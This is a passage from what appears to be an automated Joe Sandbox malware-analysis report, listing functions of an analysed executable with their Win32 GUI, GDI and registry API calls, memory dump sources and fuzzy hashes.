Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ImageList_$Icon$CreateCursorDestroyReplaceSize
String ID:
API String ID: 3228682453-0
Opcode ID: 5f5125c0aa5607ce61a02d725be8ae57f3b5c1662d1f2281a364c7eebe93d98b
Instruction ID: 6fa9d476348b25cd286178e1ae93004adb59d9ae4bf93f6f95bfb1b7544741b7
Opcode Fuzzy Hash: 5f5125c0aa5607ce61a02d725be8ae57f3b5c1662d1f2281a364c7eebe93d98b
Instruction Fuzzy Hash: 00019E71304302ABD710DFA8DC98F6BBBA8EB84B11F00892DF118DB291D774E805C761

Function 0042DBD4 Relevance: 6.0, APIs: 4, Instructions: 50COMMON

Download Yara Rule

APIs

WindowFromPoint.USER32(?,?), ref: 0042DBEC
GetParent.USER32(00000000), ref: 0042DBF9
ScreenToClient.USER32(00000000,?), ref: 0042DC1A
IsWindowEnabled.USER32(00000000), ref: 0042DC33

Part of subcall function 00438FB8: GetWindowLongA.USER32(00000000,000000F0), ref: 00438FC9

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$ClientEnabledFromLongParentPointScreen
String ID:
API String ID: 2204725058-0
Opcode ID: 26418ac28a6a063d98921b6b3a413378559930c65a585d1c593d3a72f21e1fa1
Instruction ID: e8056745c4f172340e9edacec408134d303012cac0848704d89f2a7314e6100d
Opcode Fuzzy Hash: 26418ac28a6a063d98921b6b3a413378559930c65a585d1c593d3a72f21e1fa1
Instruction Fuzzy Hash: A201F736B00A24BF87069B5AEC14DAFBAB9EFC9741B14002AF901D7314EB74CD00D768

Function 00431F51 Relevance: 6.0, APIs: 4, Instructions: 49COMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?,?), ref: 00431F5C
GetTopWindow.USER32(00000000), ref: 00431F6F
GetTopWindow.USER32(?), ref: 00431F9F
GetWindow.USER32(00000000,00000002), ref: 00431FBA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$Item
String ID:
API String ID: 369458955-0
Opcode ID: 42fa815693bfaf07cdf0cf1e45f6dfb8facdf5f00903750103c53bdf47ab01f8
Instruction ID: 354ed862884b22277bfa30491f0ca061827b6fd09776e2605669af04f537da58
Opcode Fuzzy Hash: 42fa815693bfaf07cdf0cf1e45f6dfb8facdf5f00903750103c53bdf47ab01f8
Instruction Fuzzy Hash: 2D012632105A1ABBCF223F628C00EAF3A98AF5D369F055023FC0591230D738C811AADD

Function 00431FCA Relevance: 6.0, APIs: 4, Instructions: 49windowCOMMON

Download Yara Rule

APIs

GetTopWindow.USER32(?), ref: 00431FD8
SendMessageA.USER32(00000000,?,?,?), ref: 0043200E
GetTopWindow.USER32(00000000), ref: 0043201B
GetWindow.USER32(00000000,00000002), ref: 00432039

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$MessageSend
String ID:
API String ID: 1496643700-0
Opcode ID: 4187662ea8a8d1590b56007bd88b2337359068652a1da841b148315bd75a38c9
Instruction ID: 7b2f181dec275283c69bf25e1cfb558c5692de19a4db4ce5149b3159e62689f4
Opcode Fuzzy Hash: 4187662ea8a8d1590b56007bd88b2337359068652a1da841b148315bd75a38c9
Instruction Fuzzy Hash: 6601293200061ABBCF2A6F95DD04EAF3A2AAF49355F049016FB1050161C77AD965EBA9

Function 00433D65 Relevance: 6.0, APIs: 4, Instructions: 48windowCOMMON

Download Yara Rule

APIs

EnableMenuItem.USER32(?,?,?), ref: 00433D8D
GetFocus.USER32 ref: 00433DA0
GetParent.USER32(?), ref: 00433DAE
GetNextDlgTabItem.USER32(?,?,00000000), ref: 00433DCA

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Item$EnableFocusMenuNextParent
String ID:
API String ID: 988757621-0
Opcode ID: a4bdf33bad4e29821a3b0db97521b5c128506b57473803e57e2dae9a4acada18
Instruction ID: 5f902777af0bde9f8c6746429d44e04137cefea567f2b724889424acee4db3dd
Opcode Fuzzy Hash: a4bdf33bad4e29821a3b0db97521b5c128506b57473803e57e2dae9a4acada18
Instruction Fuzzy Hash: 82116571200700EFDB299F20DC69B2BB7B5EF48316F10562EF142866A1C778E941CB58

Function 0045047A Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetStockObject.GDI32(?), ref: 00450484
SelectObject.GDI32(?,00000000), ref: 004504A4
SelectObject.GDI32(?,00000000), ref: 004504D6
SelectObject.GDI32(?,00000000), ref: 004504DC

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Object$Select$Stock
String ID:
API String ID: 3337941649-0
Opcode ID: 3e05be847a6d7f4d942438cf2feaed2ac99286b12256cc236eb4d4449bfdfbc8
Instruction ID: 7bb7f122b027ebceb0128a1012247313ccb0571d3283358f56be9831bb956f8d
Opcode Fuzzy Hash: 3e05be847a6d7f4d942438cf2feaed2ac99286b12256cc236eb4d4449bfdfbc8
Instruction Fuzzy Hash: A6F0A479600B00EB8A3057669DC5C2BBA9CEB8634A310442FFA05C2613CA68DC46CB6D

Function 00444EE0 Relevance: 6.0, APIs: 4, Instructions: 46COMMON

Download Yara Rule

APIs

GetWindowLongA.USER32(?,000000F0), ref: 00444F00
SetWindowLongA.USER32(?,000000F0,00000000), ref: 00444F13
IsWindow.USER32(?), ref: 00444F21
SetWindowLongA.USER32(?,000000F0,?), ref: 00444F32

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Window$Long
String ID:
API String ID: 847901565-0
Opcode ID: 1817070eba475c4730d7647a3011857e9edbcf13632bf024d62b8982b0246699
Instruction ID: a04db25adb97d55c94b3ba49e57ceb167685d87583fd88d35ce0d62c3feb25e9
Opcode Fuzzy Hash: 1817070eba475c4730d7647a3011857e9edbcf13632bf024d62b8982b0246699
Instruction Fuzzy Hash: 7DF0A4312096156FEB009F299C54F7F7398EF85331F20062AF515D72D2DF68A9414AAC

Function 004455BA Relevance: 6.0, APIs: 3, Strings: 1, Instructions: 46stringCOMMON

Download Yara Rule

APIs

Part of subcall function 00445594: GetParent.USER32(?), ref: 0044559E
Part of subcall function 00445594: GetParent.USER32(00000000), ref: 004455A1

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

lstrcpyA.KERNEL32(?,?), ref: 0044560A
lstrlenA.KERNEL32(?,:%d,?), ref: 00445624
wsprintfA.USER32 ref: 00445632

Strings

:%d, xrefs: 0044561E

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Parent$LongWindowlstrcpylstrlenwsprintf
String ID: :%d
API String ID: 3607597538-1955712242
Opcode ID: 01b678bca110d8ed10202b83ee25ca67df2ecceae27a034d29e357416b4b541f
Instruction ID: b7af9ab5390b93f1485f6127304614c8d0c7caf3e529b2ab6e0f40ae06299043
Opcode Fuzzy Hash: 01b678bca110d8ed10202b83ee25ca67df2ecceae27a034d29e357416b4b541f
Instruction Fuzzy Hash: 2201C070200704AFDF10AF28DC08FAA37A9AF04305F408476E90AD72A2D738D905CB88

Function 0044A247 Relevance: 6.0, APIs: 4, Instructions: 45windowCOMMON

Download Yara Rule

APIs

IsWindow.USER32(?), ref: 0044A250
SendMessageA.USER32(?,00000420,00000000,?), ref: 0044A279
SendMessageA.USER32(?,0000041F,00000000,?), ref: 0044A293
InvalidateRect.USER32(?,00000000,00000001,?,?,0044A1FF,?,?,?,?), ref: 0044A29C

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MessageSend$InvalidateRectWindow
String ID:
API String ID: 3225880595-0
Opcode ID: 8006288a988a468e7765453eae9d30b19b986399107f42ccc1b46f93c3cdfe49
Instruction ID: c4c9c4a49112f72aef1dc0a7dc299e0b50a26e38a507e8a7918dabf656381bbb
Opcode Fuzzy Hash: 8006288a988a468e7765453eae9d30b19b986399107f42ccc1b46f93c3cdfe49
Instruction Fuzzy Hash: A6015E70240718AFE7208F29DC05BBABBF4FF44711F10882AF999D6291D6B0E851EB64

Function 004288B0 Relevance: 6.0, APIs: 4, Instructions: 45threadCOMMON

Download Yara Rule

APIs

GetCurrentThreadId.KERNEL32 ref: 004288B6
EnterCriticalSection.KERNEL32(0046F280), ref: 004288C3
UnhookWindowsHookEx.USER32(?), ref: 004288FA
LeaveCriticalSection.KERNEL32(0046F280), ref: 00428939

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalSection$CurrentEnterHookLeaveThreadUnhookWindows
String ID:
API String ID: 1197249173-0
Opcode ID: e3c6bd67a2d0b8e04b354345488ddeeaf262953e07bca30a7d0d2ff305a0c7f4
Instruction ID: a529d7d9e90d23407f3d5f26dafecc2bde3207f5e077cf0a4cd80c75f2afeb2e
Opcode Fuzzy Hash: e3c6bd67a2d0b8e04b354345488ddeeaf262953e07bca30a7d0d2ff305a0c7f4
Instruction Fuzzy Hash: 5301D27828370A8FC310AF65F85463A73A4EB05701B5040BBE992C3212FB766998CF1A

Function 0043C810 Relevance: 6.0, APIs: 4, Instructions: 44registryCOMMON

Download Yara Rule

APIs

RegSetValueExA.ADVAPI32(00000000,?,00000000,00000004,?,00000004,?,?), ref: 0043C83C
RegCloseKey.ADVAPI32(00000000,?,?), ref: 0043C845
wsprintfA.USER32 ref: 0043C861
WritePrivateProfileStringA.KERNEL32(?,?,?,?), ref: 0043C87A

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ClosePrivateProfileStringValueWritewsprintf
String ID:
API String ID: 1902064621-0
Opcode ID: a31daaf049412e4fd8862d409af28f1cf9805ca881aabbedbefa8114a7c70b8d
Instruction ID: d01594573c6242a6a204920f2524644fed359c1799e9078f93759b77e1db45bc
Opcode Fuzzy Hash: a31daaf049412e4fd8862d409af28f1cf9805ca881aabbedbefa8114a7c70b8d
Instruction Fuzzy Hash: C201AD32400719BBCB116F64DC09FEE3BA8FF08755F04442AFA15A61A1E7B4D920CB88

Function 0044A88F Relevance: 6.0, APIs: 4, Instructions: 44COMMON

Download Yara Rule

APIs

Part of subcall function 00433753: GetWindowLongA.USER32(?,000000F0), ref: 0043375F

GetParent.USER32(?), ref: 0044A8B4
IsZoomed.USER32(00000000), ref: 0044A8BB
GetSystemMetrics.USER32(00000005), ref: 0044A8E3
GetSystemMetrics.USER32(00000002), ref: 0044A8F1

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: MetricsSystem$LongParentWindowZoomed
String ID:
API String ID: 3909876373-0
Opcode ID: 161d37fc3788787d43a3ddd5be3842445dbb11ee2f36ef79432fd5b76cd271d1
Instruction ID: 5af45ca9ac31144f74881aa78a5c1a884005d6a4beed9792943cb39d7ae28aa2
Opcode Fuzzy Hash: 161d37fc3788787d43a3ddd5be3842445dbb11ee2f36ef79432fd5b76cd271d1
Instruction Fuzzy Hash: 4501A232600214ABEB106FB8DC49F9EB7A8EF44745F05412AFB01AB291DAB4A901CB94

Function 004454E8 Relevance: 6.0, APIs: 4, Instructions: 44windowCOMMON

Download Yara Rule

APIs

GetMenuItemCount.USER32(?), ref: 004454F7
GetSubMenu.USER32(?,00000000), ref: 0044550B
GetMenuItemCount.USER32(00000000), ref: 00445518
GetMenuItemID.USER32(00000000,00000000), ref: 00445528

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Menu$Item$Count
String ID:
API String ID: 879546783-0
Opcode ID: 4d0c6d8dfe57e229dc1d71295cbfac494da5e2d365aee85539a8eebac8e285a2
Instruction ID: 7d54054155be19bc0229012bc9287eaaf823888e26c1cc4e2de55c9b38c33cc0
Opcode Fuzzy Hash: 4d0c6d8dfe57e229dc1d71295cbfac494da5e2d365aee85539a8eebac8e285a2
Instruction Fuzzy Hash: 66F0C232201F6177FA214A69AC48B3F7A9ADB82752F054437F905D1216CA39CC82C66A

Function 00444838 Relevance: 6.0, APIs: 4, Instructions: 43windowCOMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0044483D
SendMessageA.USER32(?,00000085,00000000,00000000), ref: 0044489B

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: H_prologMessageSend
String ID:
API String ID: 2337391251-0
Opcode ID: 9fb20dc1dc575c803b1655c21d6ae5be39b86059ef12e4525928d9916df1418f
Instruction ID: 1f1f67f989530cd98b45e3600bad742b015fccd190ee5922b78043b0b4d8c211
Opcode Fuzzy Hash: 9fb20dc1dc575c803b1655c21d6ae5be39b86059ef12e4525928d9916df1418f
Instruction Fuzzy Hash: 0D01A236900640EBEB21AF51DC15EABB7B8FFC4352F00853FF41691061DBB85805DB29

Function 00446A5B Relevance: 6.0, APIs: 4, Instructions: 43fileCOMMON

Download Yara Rule

APIs

SetActiveWindow.USER32(?), ref: 00446A6A
DragQueryFileA.SHELL32(?,000000FF,00000000,00000000,00000000), ref: 00446A85
DragQueryFileA.SHELL32(?,00000000,?,00000104), ref: 00446AA7
DragFinish.SHELL32(?), ref: 00446AC0

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Drag$FileQuery$ActiveFinishWindow
String ID:
API String ID: 892977027-0
Opcode ID: b88a9454a4070fbd692225b6ef3987b8e72b6e0f5a2cfbd473a725921b32d749
Instruction ID: 21ed6dfbf9db0c41358cf245e13bd99f464ac6ae99d7b24369c4b82b5556a828
Opcode Fuzzy Hash: b88a9454a4070fbd692225b6ef3987b8e72b6e0f5a2cfbd473a725921b32d749
Instruction Fuzzy Hash: 24018B71900208BFDF00AFA4DC84DAE7BACEB05359B108166B155A6061CB70AD81CB64

Function 00432B19 Relevance: 6.0, APIs: 4, Instructions: 43COMMON

Download Yara Rule

APIs

GetObjectA.GDI32(00000000,0000000C,?), ref: 00432B57
SetBkColor.GDI32(00000000,00000000), ref: 00432B63
GetSysColor.USER32(00000008), ref: 00432B73
SetTextColor.GDI32(00000000,?), ref: 00432B7D

Part of subcall function 00438FB8: GetWindowLongA.USER32(00000000,000000F0), ref: 00438FC9

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: Color$LongObjectTextWindow
String ID:
API String ID: 2871169696-0
Opcode ID: ba4384b1889a4ae34abadfb62279316622faa980441e4e31b61bccddf15b9305
Instruction ID: 2c9c449cbc5cba24a7e2537ef70ce56658bbb0f3f438bd43de362007bb222987
Opcode Fuzzy Hash: ba4384b1889a4ae34abadfb62279316622faa980441e4e31b61bccddf15b9305
Instruction Fuzzy Hash: 5101863450064EBBDF215F64EE49BAFBB65EB08361F505522F909D41E0C7B4EC90CB59

Function 00427B17 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE

Download Yara Rule

APIs

InterlockedExchange.KERNEL32(0046DE80,00000001), ref: 00427B3F
InitializeCriticalSection.KERNEL32(0046DE68,?,?,?,00425A09), ref: 00427B4A
EnterCriticalSection.KERNEL32(0046DE68,?,?,?,00425A09), ref: 00427B89

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: CriticalSection$EnterExchangeInitializeInterlocked
String ID:
API String ID: 3643093385-0
Opcode ID: d6245ff5e23f976008e8418b9af9acf000f0be581d9098ce7e8ffa93bbd5939f
Instruction ID: f46e3649ade184c22ff6dc6adfb26cfdbdb8701b9a8f0879e4b90396e3480ee2
Opcode Fuzzy Hash: d6245ff5e23f976008e8418b9af9acf000f0be581d9098ce7e8ffa93bbd5939f
Instruction Fuzzy Hash: BFF06231F49B209ACB214756BC89A263A55E7507A9F600137F20189251E7EAD840D71E

Function 00438AA6 Relevance: 6.0, APIs: 4, Instructions: 42COMMON

Download Yara Rule

APIs

GetWindowExtEx.GDI32(?,00414918,00000000,?,?,?,00414918,?,?,?,?,?,?,00000000,00000000), ref: 00438AB7
GetViewportExtEx.GDI32(?,?,?,00414918,?,?,?,?,?,?,00000000,00000000), ref: 00438AC4
MulDiv.KERNEL32(00414918,00000000,00000000), ref: 00438AE9
MulDiv.KERNEL32(46892C46,00000000,00000000), ref: 00438B04

Memory Dump Source

Source File: 00000000.00000002.1491337446.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.1491319679.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491373171.0000000000455000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.0000000000468000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046D000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491415368.000000000046F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000000.00000002.1491454931.0000000000470000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_ExeFile (360).jbxd

Similarity

API ID: ViewportWindow
String ID:
API String ID: 1589084482-0
Opcode ID: 81dace6de5dd33ee5a43509eaab52de1f3040316adbf9ff5ea26c4ddc0249c15
Instruction ID: 6c13f0916dec615ce7147448dbc62a70fa53413852774deb4d31ec0ab60ed151
